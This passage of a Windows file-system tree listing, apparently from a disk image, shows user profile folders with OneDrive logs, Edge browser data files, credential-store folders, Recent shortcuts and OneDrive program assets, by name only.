│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-14.1630.7772.1.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-14.1631.756.1.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-15.2105.7096.1.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-15.2106.3780.1.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-15.2107.3780.2.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-15.2122.2604.1.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-15.2122.2604.2.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-20.1657.8856.1.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-20.1657.8856.2.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-20.1713.6640.1.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-20.1713.6640.2.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-25.1952.7572.1.odlgz
│   │   │   │   │   │   │   │       ├── SyncEngine-2025-08-25.1952.7572.2.aodl
│   │   │   │   │   │   │   │       ├── telemetryCache.otc.session
│   │   │   │   │   │   │   │       ├── telemetry-dll-ramp-value.txt
│   │   │   │   │   │   │   │       ├── TraceCurrent.0304.0013.etl
│   │   │   │   │   │   │   │       ├── Update_2025-08-14_163046_1e5c-1bbc.loggz
│   │   │   │   │   │   │   │       ├── Update_2025-08-15_210534_7096-7100.loggz
│   │   │   │   │   │   │   │       └── Update_2025-08-15_212259_2604-436.loggz
│   │   │   │   │   │   │   └── settings
│   │   │   │   │   │   │       ├── FileSyncFSCache.db-shm
│   │   │   │   │   │   │       ├── FileSyncFSCache.db-wal
│   │   │   │   │   │   │       ├── Personal
│   │   │   │   │   │   │       │   ├── assertInformation.ini
│   │   │   │   │   │   │       │   ├── CxP.db-shm
│   │   │   │   │   │   │       │   ├── CxP.db-wal
│   │   │   │   │   │   │       │   ├── ECSConfig.json
│   │   │   │   │   │   │       │   ├── global.ini
│   │   │   │   │   │   │       │   ├── logUploaderSettings.ini
│   │   │   │   │   │   │       │   ├── OCSI.db-shm
│   │   │   │   │   │   │       │   ├── SettingsDatabase.db-shm
│   │   │   │   │   │   │       │   ├── SettingsDatabase.db-wal
│   │   │   │   │   │   │       │   ├── SurveyManagerState.json
│   │   │   │   │   │   │       │   └── UXDatabase.db
│   │   │   │   │   │   │       └── PreSignInSettingsConfig.json
│   │   │   │   │   │   └── Windows
│   │   │   │   │   │       ├── Explorer
│   │   │   │   │   │       │   ├── thumbcache_1280.db
│   │   │   │   │   │       │   ├── thumbcache_16.db
│   │   │   │   │   │       │   ├── thumbcache_1920.db
│   │   │   │   │   │       │   ├── thumbcache_2560.db
│   │   │   │   │   │       │   ├── thumbcache_256.db
│   │   │   │   │   │       │   ├── thumbcache_32.db
│   │   │   │   │   │       │   ├── thumbcache_768.db
│   │   │   │   │   │       │   ├── thumbcache_96.db
│   │   │   │   │   │       │   ├── thumbcache_custom_stream.db
│   │   │   │   │   │       │   ├── thumbcache_exif.db
│   │   │   │   │   │       │   ├── thumbcache_idx.db
│   │   │   │   │   │       │   ├── thumbcache_sr.db
│   │   │   │   │   │       │   ├── thumbcache_wide_alternate.db
│   │   │   │   │   │       │   └── thumbcache_wide.db
│   │   │   │   │   │       ├── History
│   │   │   │   │   │       │   └── desktop.ini
│   │   │   │   │   │       ├── UsrClass.dat
│   │   │   │   │   │       ├── UsrClass.dat.LOG1
│   │   │   │   │   │       ├── UsrClass.dat.LOG2
│   │   │   │   │   │       └── WebCache
│   │   │   │   │   │           ├── V0100009.log
│   │   │   │   │   │           ├── V010000A.log
│   │   │   │   │   │           ├── V01.chk
│   │   │   │   │   │           ├── V01.log
│   │   │   │   │   │           ├── V01tmp.log
│   │   │   │   │   │           ├── WebCacheV01.dat
│   │   │   │   │   │           └── WebCacheV01.jfm
│   │   │   │   │   └── Packages
│   │   │   │   │       └── Microsoft.MicrosoftEdge_8wekyb3d8bbwe
│   │   │   │   │           ├── LocalState
│   │   │   │   │           │   └── PinnedTiles
│   │   │   │   │           │       ├── 26310719480
│   │   │   │   │           │       │   ├── squaretile.png
│   │   │   │   │           │       │   └── tinytile.png
│   │   │   │   │           │       ├── 38975140460
│   │   │   │   │           │       │   ├── squaretile.png
│   │   │   │   │           │       │   └── tinytile.png
│   │   │   │   │           │       ├── 6501008900
│   │   │   │   │           │       │   ├── squaretile.png
│   │   │   │   │           │       │   └── tinytile.png
│   │   │   │   │           │       └── 7603651830
│   │   │   │   │           │           ├── squaretile.png
│   │   │   │   │           │           └── tinytile.png
│   │   │   │   │           └── Settings
│   │   │   │   │               └── settings.dat
│   │   │   │   └── Roaming
│   │   │   │       └── Microsoft
│   │   │   │           ├── Internet Explorer
│   │   │   │           │   └── Quick Launch
│   │   │   │           │       ├── desktop.ini
│   │   │   │           │       ├── Microsoft Edge.lnk
│   │   │   │           │       ├── Shows Desktop.lnk
│   │   │   │           │       ├── User Pinned
│   │   │   │           │       │   └── TaskBar
│   │   │   │           │       │       ├── desktop.ini
│   │   │   │           │       │       ├── File Explorer.lnk
│   │   │   │           │       │       └── Microsoft Edge.lnk
│   │   │   │           │       └── Window Switcher.lnk
│   │   │   │           ├── Protect
│   │   │   │           │   └── S-1-5-21-3871582759-1638593395-315824688-500
│   │   │   │           │       ├── 275cad93-d3d0-4a44-bbb3-62366bf077e4
│   │   │   │           │       ├── 95bb4295-a4ff-4e6d-8252-6e78bbc17e45
│   │   │   │           │       └── Preferred
│   │   │   │           └── Windows
│   │   │   │               ├── PowerShell
│   │   │   │               │   └── PSReadline
│   │   │   │               │       └── ConsoleHost_history.txt
│   │   │   │               ├── Recent
│   │   │   │               │   ├── AutomaticDestinations
│   │   │   │               │   │   ├── 5f7b5f1e01b83767.automaticDestinations-ms
│   │   │   │               │   │   ├── 7e4dca80246863e3.automaticDestinations-ms
│   │   │   │               │   │   ├── 9b9cdc69c1c24e2b.automaticDestinations-ms
│   │   │   │               │   │   ├── f01b4d95cf55d32a.automaticDestinations-ms
│   │   │   │               │   │   └── f18460fded109990.automaticDestinations-ms
│   │   │   │               │   ├── CustomDestinations
│   │   │   │               │   │   ├── 590aee7bdd69b59b.customDestinations-ms
│   │   │   │               │   │   ├── 7e4dca80246863e3.customDestinations-ms
│   │   │   │               │   │   ├── ccba5a5986c77e43.customDestinations-ms
│   │   │   │               │   │   ├── f01b4d95cf55d32a.customDestinations-ms
│   │   │   │               │   │   └── f18460fded109990.customDestinations-ms
│   │   │   │               │   ├── desktop.ini
│   │   │   │               │   ├── Desktop.lnk
│   │   │   │               │   ├── Device Manager.lnk
│   │   │   │               │   ├── Documents.lnk
│   │   │   │               │   ├── id_rsa.lnk
│   │   │   │               │   ├── Modules.lnk
│   │   │   │               │   ├── monitor.lnk
│   │   │   │               │   ├── ms-settingsnetwork.lnk
│   │   │   │               │   ├── OUTPUTS.lnk
│   │   │   │               │   ├── Quick access.lnk
│   │   │   │               │   ├── Target.lnk
│   │   │   │               │   ├── This PC.lnk
│   │   │   │               │   ├── todo.lnk
│   │   │   │               │   ├── Users.lnk
│   │   │   │               │   └── Werni.lnk
│   │   │   │               └── Start Menu
│   │   │   │                   └── Programs
│   │   │   │                       └── OneDrive.lnk
│   │   │   ├── Desktop
│   │   │   │   └── Microsoft Edge.lnk
│   │   │   ├── NTUSER.DAT
│   │   │   ├── ntuser.dat.LOG1
│   │   │   └── ntuser.dat.LOG2
│   │   ├── Default
│   │   │   ├── NTUSER.DAT
│   │   │   ├── NTUSER.DAT.LOG1
│   │   │   └── NTUSER.DAT.LOG2
│   │   └── Werni
│   │       ├── AppData
│   │       │   ├── Local
│   │       │   │   ├── Comms
│   │       │   │   │   ├── Unistore
│   │       │   │   │   │   └── data
│   │       │   │   │   │       └── AggregateCache.uca
│   │       │   │   │   └── UnistoreDB
│   │       │   │   │       ├── store.jfm
│   │       │   │   │       ├── store.vol
│   │       │   │   │       ├── USS.jcp
│   │       │   │   │       ├── USS.jtx
│   │       │   │   │       ├── USSres00001.jrs
│   │       │   │   │       ├── USSres00002.jrs
│   │       │   │   │       └── USStmp.jtx
│   │       │   │   ├── ConnectedDevicesPlatform
│   │       │   │   │   ├── CDPGlobalSettings.cdp
│   │       │   │   │   ├── Connected Devices Platform certificates.sst
│   │       │   │   │   ├── L.Werni
│   │       │   │   │   │   ├── ActivitiesCache.db
│   │       │   │   │   │   ├── ActivitiesCache.db-shm
│   │       │   │   │   │   └── ActivitiesCache.db-wal
│   │       │   │   │   ├── L.Werni.cdp
│   │       │   │   │   └── L.Werni.cdpresource
│   │       │   │   ├── D3DSCache
│   │       │   │   │   └── 45a5e5b635b28e7a
│   │       │   │   │       ├── F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
│   │       │   │   │       ├── F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
│   │       │   │   │       └── F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
│   │       │   │   ├── IconCache.db
│   │       │   │   ├── JM.ps1
│   │       │   │   ├── Microsoft
│   │       │   │   │   ├── CLR_v4.0
│   │       │   │   │   │   └── ngen.log
│   │       │   │   │   ├── CLR_v4.0_32
│   │       │   │   │   │   └── ngen.log
│   │       │   │   │   ├── Credentials
│   │       │   │   │   │   └── DFBE70A7E5CC19A398EBF1B96859CE5D
│   │       │   │   │   ├── Edge
│   │       │   │   │   │   └── User Data
│   │       │   │   │   │       ├── BrowserMetrics
│   │       │   │   │   │       │   └── BrowserMetrics-689FA595-A90.pma
│   │       │   │   │   │       ├── Crashpad
│   │       │   │   │   │       │   ├── metadata
│   │       │   │   │   │       │   ├── settings.dat
│   │       │   │   │   │       │   └── throttle_store.dat
│   │       │   │   │   │       ├── Default
│   │       │   │   │   │       │   ├── ClientCertificates
│   │       │   │   │   │       │   │   ├── LOCK
│   │       │   │   │   │       │   │   └── LOG
│   │       │   │   │   │       │   ├── Code Cache
│   │       │   │   │   │       │   │   ├── js
│   │       │   │   │   │       │   │   │   ├── index
│   │       │   │   │   │       │   │   │   └── index-dir
│   │       │   │   │   │       │   │   │       └── the-real-index
│   │       │   │   │   │       │   │   └── wasm
│   │       │   │   │   │       │   │       ├── index
│   │       │   │   │   │       │   │       └── index-dir
│   │       │   │   │   │       │   │           └── the-real-index
│   │       │   │   │   │       │   ├── commerce_subscription_db
│   │       │   │   │   │       │   │   ├── LOCK
│   │       │   │   │   │       │   │   └── LOG
│   │       │   │   │   │       │   ├── discount_infos_db
│   │       │   │   │   │       │   │   ├── LOCK
│   │       │   │   │   │       │   │   └── LOG
│   │       │   │   │   │       │   ├── discounts_db
│   │       │   │   │   │       │   │   ├── LOCK
│   │       │   │   │   │       │   │   └── LOG
│   │       │   │   │   │       │   ├── EdgeCoupons
│   │       │   │   │   │       │   │   └── coupons_data.db
│   │       │   │   │   │       │   │       ├── 000003.log
│   │       │   │   │   │       │   │       ├── CURRENT
│   │       │   │   │   │       │   │       ├── LOCK
│   │       │   │   │   │       │   │       ├── LOG
│   │       │   │   │   │       │   │       └── MANIFEST-000001
│   │       │   │   │   │       │   ├── EdgeEDrop
│   │       │   │   │   │       │   │   ├── EdgeEDropSQLite.db
│   │       │   │   │   │       │   │   └── EdgeEDropSQLite.db-journal
│   │       │   │   │   │       │   ├── EdgeHubAppUsage
│   │       │   │   │   │       │   │   ├── EdgeHubAppUsageSQLite.db
│   │       │   │   │   │       │   │   └── EdgeHubAppUsageSQLite.db-journal
│   │       │   │   │   │       │   ├── Edge Profile.ico
│   │       │   │   │   │       │   ├── EdgePushStorageWithConnectTokenAndKey
│   │       │   │   │   │       │   │   ├── LOCK
│   │       │   │   │   │       │   │   ├── LOG
│   │       │   │   │   │       │   │   └── LOG.old
│   │       │   │   │   │       │   ├── Extension Rules
│   │       │   │   │   │       │   │   ├── 000003.log
│   │       │   │   │   │       │   │   ├── CURRENT
│   │       │   │   │   │       │   │   ├── LOCK
│   │       │   │   │   │       │   │   ├── LOG
│   │       │   │   │   │       │   │   └── MANIFEST-000001
│   │       │   │   │   │       │   ├── Extension Scripts
│   │       │   │   │   │       │   │   ├── 000003.log
│   │       │   │   │   │       │   │   ├── CURRENT
│   │       │   │   │   │       │   │   ├── LOCK
│   │       │   │   │   │       │   │   ├── LOG
│   │       │   │   │   │       │   │   └── MANIFEST-000001
│   │       │   │   │   │       │   ├── Favicons
│   │       │   │   │   │       │   ├── Favicons-journal
│   │       │   │   │   │       │   ├── History
│   │       │   │   │   │       │   ├── History-journal
│   │       │   │   │   │       │   ├── Local Storage
│   │       │   │   │   │       │   │   └── leveldb
│   │       │   │   │   │       │   │       ├── LOCK
│   │       │   │   │   │       │   │       └── LOG
│   │       │   │   │   │       │   ├── LOCK
│   │       │   │   │   │       │   ├── LOG
│   │       │   │   │   │       │   ├── Login Data
│   │       │   │   │   │       │   ├── Login Data-journal
│   │       │   │   │   │       │   ├── Network
│   │       │   │   │   │       │   │   └── NetworkDataMigrated
│   │       │   │   │   │       │   ├── Nurturing
│   │       │   │   │   │       │   │   ├── campaign_history
│   │       │   │   │   │       │   │   └── campaign_history-journal
│   │       │   │   │   │       │   ├── parcel_tracking_db
│   │       │   │   │   │       │   │   ├── LOCK
│   │       │   │   │   │       │   │   └── LOG
│   │       │   │   │   │       │   ├── PersistentOriginTrials
│   │       │   │   │   │       │   │   ├── LOCK
│   │       │   │   │   │       │   │   └── LOG
│   │       │   │   │   │       │   ├── Preferences
│   │       │   │   │   │       │   ├── README
│   │       │   │   │   │       │   ├── Safe Browsing Network
│   │       │   │   │   │       │   │   └── NetworkDataMigrated
│   │       │   │   │   │       │   ├── Secure Preferences
│   │       │   │   │   │       │   ├── ServerCertificate
│   │       │   │   │   │       │   ├── ServerCertificate-journal
│   │       │   │   │   │       │   ├── Site Characteristics Database
│   │       │   │   │   │       │   │   ├── 000003.log
│   │       │   │   │   │       │   │   ├── CURRENT
│   │       │   │   │   │       │   │   ├── LOCK
│   │       │   │   │   │       │   │   ├── LOG
│   │       │   │   │   │       │   │   └── MANIFEST-000001
│   │       │   │   │   │       │   ├── Sync Data
│   │       │   │   │   │       │   │   └── LevelDB
│   │       │   │   │   │       │   │       ├── 000003.log
│   │       │   │   │   │       │   │       ├── CURRENT
│   │       │   │   │   │       │   │       ├── LOCK
│   │       │   │   │   │       │   │       ├── LOG
│   │       │   │   │   │       │   │       └── MANIFEST-000001
│   │       │   │   │   │       │   ├── Top Sites
│   │       │   │   │   │       │   ├── Top Sites-journal
│   │       │   │   │   │       │   ├── Vpn Tokens
│   │       │   │   │   │       │   └── Vpn Tokens-journal
│   │       │   │   │   │       ├── Last Version
│   │       │   │   │   │       ├── Local State
│   │       │   │   │   │       ├── Nurturing
│   │       │   │   │   │       │   ├── campaign_history
│   │       │   │   │   │       │   └── campaign_history-journal
│   │       │   │   │   │       ├── ShaderCache
│   │       │   │   │   │       │   ├── data_0
│   │       │   │   │   │       │   ├── data_1
│   │       │   │   │   │       │   ├── data_2
│   │       │   │   │   │       │   ├── data_3
│   │       │   │   │   │       │   └── index
│   │       │   │   │   │       └── Variations
│   │       │   │   │   ├── GameDVR
│   │       │   │   │   │   └── KnownGameList.bin
│   │       │   │   │   ├── input
│   │       │   │   │   │   └── en-US
│   │       │   │   │   │       └── userdict_v1.0409.dat
│   │       │   │   │   ├── Internet Explorer
│   │       │   │   │   │   ├── brndlog.txt
│   │       │   │   │   │   ├── CacheStorage
│   │       │   │   │   │   │   ├── edb.chk
│   │       │   │   │   │   │   ├── edb.log
│   │       │   │   │   │   │   ├── edbres00001.jrs
│   │       │   │   │   │   │   ├── edbres00002.jrs
│   │       │   │   │   │   │   └── edbtmp.log
│   │       │   │   │   │   ├── ie4uinit-ClearIconCache.log
│   │       │   │   │   │   ├── ie4uinit-UserConfig.log
│   │       │   │   │   │   ├── IECompatData
│   │       │   │   │   │   │   └── iecompatdata.xml
│   │       │   │   │   │   └── MSIMGSIZ.DAT
│   │       │   │   │   ├── Media Player
│   │       │   │   │   │   └── Sync Playlists
│   │       │   │   │   │       └── en-US
│   │       │   │   │   │           └── 00029C36
│   │       │   │   │   │               ├── 01_Music_auto_rated_at_5_stars.wpl
│   │       │   │   │   │               ├── 02_Music_added_in_the_last_month.wpl
│   │       │   │   │   │               ├── 03_Music_rated_at_4_or_5_stars.wpl
│   │       │   │   │   │               ├── 04_Music_played_in_the_last_month.wpl
│   │       │   │   │   │               ├── 05_Pictures_taken_in_the_last_month.wpl
│   │       │   │   │   │               ├── 06_Pictures_rated_4_or_5_stars.wpl
│   │       │   │   │   │               ├── 07_TV_recorded_in_the_last_week.wpl
│   │       │   │   │   │               ├── 08_Video_rated_at_4_or_5_stars.wpl
│   │       │   │   │   │               ├── 09_Music_played_the_most.wpl
│   │       │   │   │   │               ├── 10_All_Music.wpl
│   │       │   │   │   │               ├── 11_All_Pictures.wpl
│   │       │   │   │   │               └── 12_All_Video.wpl
│   │       │   │   │   ├── OneDrive
│   │       │   │   │   │   ├── 25.140.0720.0001
│   │       │   │   │   │   │   ├── adal.dll
│   │       │   │   │   │   │   ├── adm
│   │       │   │   │   │   │   │   ├── de
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── es
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── fr
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── hu
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── it
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── ja
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── ko
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── nl
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── OneDrive.adml
│   │       │   │   │   │   │   │   ├── OneDrive.admx
│   │       │   │   │   │   │   │   ├── pl
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── pt-BR
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── pt-PT
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── ru
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── sv
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── tr
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   ├── zh-CN
│   │       │   │   │   │   │   │   │   └── OneDrive.adml
│   │       │   │   │   │   │   │   └── zh-TW
│   │       │   │   │   │   │   │       └── OneDrive.adml
│   │       │   │   │   │   │   ├── af
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── alertIcon.png
│   │       │   │   │   │   │   ├── alertIconWhite.png
│   │       │   │   │   │   │   ├── am-ET
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── Animation.html
│   │       │   │   │   │   │   ├── api-ms-win-core-console-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-console-l1-2-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-datetime-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-debug-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-errorhandling-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-fibers-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-file-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-file-l1-2-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-file-l2-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-handle-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-heap-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-interlocked-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-libraryloader-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-localization-l1-2-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-memory-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-namedpipe-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-processenvironment-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-processthreads-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-processthreads-l1-1-1.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-profile-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-rtlsupport-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-string-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-synch-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-synch-l1-2-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-sysinfo-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-timezone-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-core-util-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-conio-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-convert-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-environment-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-filesystem-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-heap-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-locale-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-math-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-multibyte-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-private-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-process-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-runtime-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-stdio-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-string-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-time-l1-1-0.dll
│   │       │   │   │   │   │   ├── api-ms-win-crt-utility-l1-1-0.dll
│   │       │   │   │   │   │   ├── AppBlue.png
│   │       │   │   │   │   │   ├── AppErrorBlue.png
│   │       │   │   │   │   │   ├── AppErrorWhite.png
│   │       │   │   │   │   │   ├── AppWhite.png
│   │       │   │   │   │   │   ├── ar
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── as-IN
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── Assets
│   │       │   │   │   │   │   │   ├── Square44x44Logo.altform-lightunplated_targetsize-16.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.altform-lightunplated_targetsize-24.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.altform-lightunplated_targetsize-256.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.altform-lightunplated_targetsize-32.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.altform-lightunplated_targetsize-48.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.altform-unplated_targetsize-16.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.altform-unplated_targetsize-24.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.altform-unplated_targetsize-256.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.altform-unplated_targetsize-32.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.altform-unplated_targetsize-48.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.scale-100.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.scale-125.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.scale-150.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.scale-200.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.scale-400.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-16.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-24.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-256.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-32.png
│   │       │   │   │   │   │   │   └── Square44x44Logo.targetsize-48.png
│   │       │   │   │   │   │   ├── AutoPlayOptIn.gif
│   │       │   │   │   │   │   ├── AutoPlayOptIn.png
│   │       │   │   │   │   │   ├── az-Latn-AZ
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── bg
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── bn-IN
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── bs-Latn-BA
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── Bundle
│   │       │   │   │   │   │   │   ├── Assets
│   │       │   │   │   │   │   │   │   ├── common
│   │       │   │   │   │   │   │   │   │   └── assets
│   │       │   │   │   │   │   │   │   │       └── images
│   │       │   │   │   │   │   │   │   │           ├── aboutIcon.png
│   │       │   │   │   │   │   │   │   │           ├── accountIcon.png
│   │       │   │   │   │   │   │   │   │           ├── acmDismiss.png
│   │       │   │   │   │   │   │   │   │           ├── addedFolderIcon_mac@2x.png
│   │       │   │   │   │   │   │   │   │           ├── addedFolderIcon_mac.png
│   │       │   │   │   │   │   │   │   │           ├── addedFolderIcon_win@2x.png
│   │       │   │   │   │   │   │   │   │           ├── addedFolderIcon_win.png
│   │       │   │   │   │   │   │   │   │           ├── add-to-onedrive.png
│   │       │   │   │   │   │   │   │   │           ├── AISearchDark.png
│   │       │   │   │   │   │   │   │   │           ├── AISearch.png
│   │       │   │   │   │   │   │   │   │           ├── blue_cloud48x48.png
│   │       │   │   │   │   │   │   │   │           ├── BlueCloudCritical_Win11@2x.png
│   │       │   │   │   │   │   │   │   │           ├── BlueCloudCritical_Win11@3x.png
│   │       │   │   │   │   │   │   │   │           ├── BlueCloudCritical_Win11.png
│   │       │   │   │   │   │   │   │   │           ├── blue_cloud.png
│   │       │   │   │   │   │   │   │   │           ├── bugIcon22x22.png
│   │       │   │   │   │   │   │   │   │           ├── cancel@2x.png
│   │       │   │   │   │   │   │   │   │           ├── cancel@3x.png
│   │       │   │   │   │   │   │   │   │           ├── cancel.png
│   │       │   │   │   │   │   │   │   │           ├── chevronDown.png
│   │       │   │   │   │   │   │   │   │           ├── chevronRight.png
│   │       │   │   │   │   │   │   │   │           ├── chevronUp.png
│   │       │   │   │   │   │   │   │   │           ├── cloud.png
│   │       │   │   │   │   │   │   │   │           ├── coloredFolders.png
│   │       │   │   │   │   │   │   │   │           ├── desktop.png
│   │       │   │   │   │   │   │   │   │           ├── diamond@2x.png
│   │       │   │   │   │   │   │   │   │           ├── diamond@3x.png
│   │       │   │   │   │   │   │   │   │           ├── diamond.png
│   │       │   │   │   │   │   │   │   │           ├── documents.png
│   │       │   │   │   │   │   │   │   │           ├── downloads.png
│   │       │   │   │   │   │   │   │   │           ├── errorDark.png
│   │       │   │   │   │   │   │   │   │           ├── error.png
│   │       │   │   │   │   │   │   │   │           ├── exitIcon22x22.png
│   │       │   │   │   │   │   │   │   │           ├── feedbackIcon22x22.png
│   │       │   │   │   │   │   │   │   │           ├── file.png
│   │       │   │   │   │   │   │   │   │           ├── folder20x20@2x.png
│   │       │   │   │   │   │   │   │   │           ├── folder20x20.png
│   │       │   │   │   │   │   │   │   │           ├── fond_download_all.png
│   │       │   │   │   │   │   │   │   │           ├── fond_free_up_space.png
│   │       │   │   │   │   │   │   │   │           ├── getHelp_light.png
│   │       │   │   │   │   │   │   │   │           ├── giveFeedback_light.png
│   │       │   │   │   │   │   │   │   │           ├── globeIcon.png
│   │       │   │   │   │   │   │   │   │           ├── helpIcon22x22.png
│   │       │   │   │   │   │   │   │   │           ├── help.png
│   │       │   │   │   │   │   │   │   │           ├── house.png
│   │       │   │   │   │   │   │   │   │           ├── ic_fluent_add_24_filled.png
│   │       │   │   │   │   │   │   │   │           ├── infoDanger@2x.png
│   │       │   │   │   │   │   │   │   │           ├── infoDanger@3x.png
│   │       │   │   │   │   │   │   │   │           ├── infoDanger.png
│   │       │   │   │   │   │   │   │   │           ├── infoDark.png
│   │       │   │   │   │   │   │   │   │           ├── infoOutline.png
│   │       │   │   │   │   │   │   │   │           ├── info.png
│   │       │   │   │   │   │   │   │   │           ├── infoWarningDark.png
│   │       │   │   │   │   │   │   │   │           ├── infoWarning.png
│   │       │   │   │   │   │   │   │   │           ├── layerIcon22x22.png
│   │       │   │   │   │   │   │   │   │           ├── music.png
│   │       │   │   │   │   │   │   │   │           ├── notificationsIcon.png
│   │       │   │   │   │   │   │   │   │           ├── openFolder20x20@2x.png
